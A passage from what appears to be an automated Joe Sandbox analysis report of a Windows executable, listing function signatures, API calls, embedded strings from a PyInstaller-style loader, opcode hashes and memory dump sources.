                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 7f316b75b052e126dea546533144c62575de451f153120a8ff292f111315de16
                                                                                                                                                                                                                            • Instruction ID: b6df5401b62c5dd48a90c09d9f6c656ffe807b33357584b01d02c4a02d9706fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f316b75b052e126dea546533144c62575de451f153120a8ff292f111315de16
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1461E922F0C28286F766993A855027D6E91BF50778FB64639D61EC66C7DEFDE8008740
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                            • Instruction ID: 800e5fc225092d08f03f55086ec21249f01bab7dd975b92a58fe025ddc449f1c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46514276E1875186EB648F2AC0442283BA5EF55B6CF344131CE4D977D6CF7AE852CB80
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                            • Opcode ID: 61b247ec2cd4a56554382bf708fbc4e01f38c172e17036847b2aeb904ed1f5a4
                                                                                                                                                                                                                            • Instruction ID: 5b6b25e30ae39abc178fdf0d6bca960bbe005cd3a7d62833416b873a4a0d6af5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61b247ec2cd4a56554382bf708fbc4e01f38c172e17036847b2aeb904ed1f5a4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9411122B14A5482EF44CF2BD9145A967A1FF48FD8B289032EE0DD7B59DE7CD4428340
Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                            • API String ID: 190572456-573889970
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF602997BE7,?,?,FFFFFFFF,00007FF602993834), ref: 00007FF60299777C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                            • Opcode ID: d5b32d71c33d064cea4f100581863d6417d5572bcca18dbea7b62c7b42b3309f
                                                                                                                                                                                                                            • Instruction ID: 4c1ffc745fbe2f22a30b0de5f25ac9d51ab454988e8d5ed9181b404415dd6404
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5b32d71c33d064cea4f100581863d6417d5572bcca18dbea7b62c7b42b3309f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C12C761F0C34386FB605B1AD0446797AA1FF80758FE64035E68AC76C6DFBCE9808B90
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                            • Opcode ID: 4f5db8db42a179c859e09bf65a593195edfd865d507e78e6ef289098e6d7c94c
                                                                                                                                                                                                                            • Instruction ID: 7386165c8d81491c8f5b2032706016064dd7a730c507caace44343a0afb06f49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f5db8db42a179c859e09bf65a593195edfd865d507e78e6ef289098e6d7c94c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD12A532E0C35386FB609A16E0547B97AA1FF8075CFA44135E699876C6DFBCE480CB81
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: 95384b4ce990e1df0dc17a3476bd79f25d99c368e091164d9f543bba941a9f0f
                                                                                                                                                                                                                            • Instruction ID: 61071919497190408305b52eff83032eb13e3f3dd0a51340af775f8bec4c68fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95384b4ce990e1df0dc17a3476bd79f25d99c368e091164d9f543bba941a9f0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341A121B086435AFA209B1BA9402BAAB91FF44BECF644031DD4DC7B97DEBCF4158740
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: ff0acaeb77fe319464f1ac4b29543caf46e6389b2aac69788df65a770f30c031
                                                                                                                                                                                                                            • Instruction ID: 05d9939a604ca1e7857d80ceffd146b9703c76f20ee8ac666096bf33306acd8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff0acaeb77fe319464f1ac4b29543caf46e6389b2aac69788df65a770f30c031
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141B921B086434AFE219B1BA5401B96BA0FF047E8F744031DE5EC7A97EEBCE4518740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            • Opcode ID: 19671194003f52c4278ab70e2128ccfc4a2a1802a4b374d55b6eb69b848c92c7
                                                                                                                                                                                                                            • Instruction ID: 93098e32f870effb9facc280b8d9133888da80a053ba9aa26927f05bb22821f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19671194003f52c4278ab70e2128ccfc4a2a1802a4b374d55b6eb69b848c92c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4D175329087418AEB20EB6AD4813AD7BA4FF557ACF200135EE4D97B96DF78E460C750
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDBD
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDCB
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDF5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE63
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE6F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
APIs
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
APIs
• GetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA157
• FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA18D
• FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1BA
• FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1CB
• FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1DC
• SetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1F7
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
Strings
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
• API String ID: 1878133881-640379615
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction ID: b5aee352305c4dbf249c6b6d74961919f0a3851795192f7b1c84ca149870ad73
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F09661F0870681FB108B26E4483395B60FF89BA9F740635C9ADC55F6CFACD449C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction ID: 332dd5e9d991a9e25a840e94597d944fa3de8dd085fc6cfaa2d312877b281fdc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6119EB2E1CA1301F756112AF6623B91D4BBF5D378F780A34E96E866D7CEECA8414204
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA22F
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA24E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA276
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA287
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA298
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: af8da5a527d05b95a7852b7dd45c45bc26a6b8390686fc0ba138860700093caa
                                                                                                                                                                                                                            • Instruction ID: 02b421b03c9dd081dc2a305b6c1ce0c24cae06c17d3a6b44948bb8b23705faba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af8da5a527d05b95a7852b7dd45c45bc26a6b8390686fc0ba138860700093caa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51114C20E0C70243FB999727964117969926F547B8F344734EC3E86BDBDEADE851C390
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
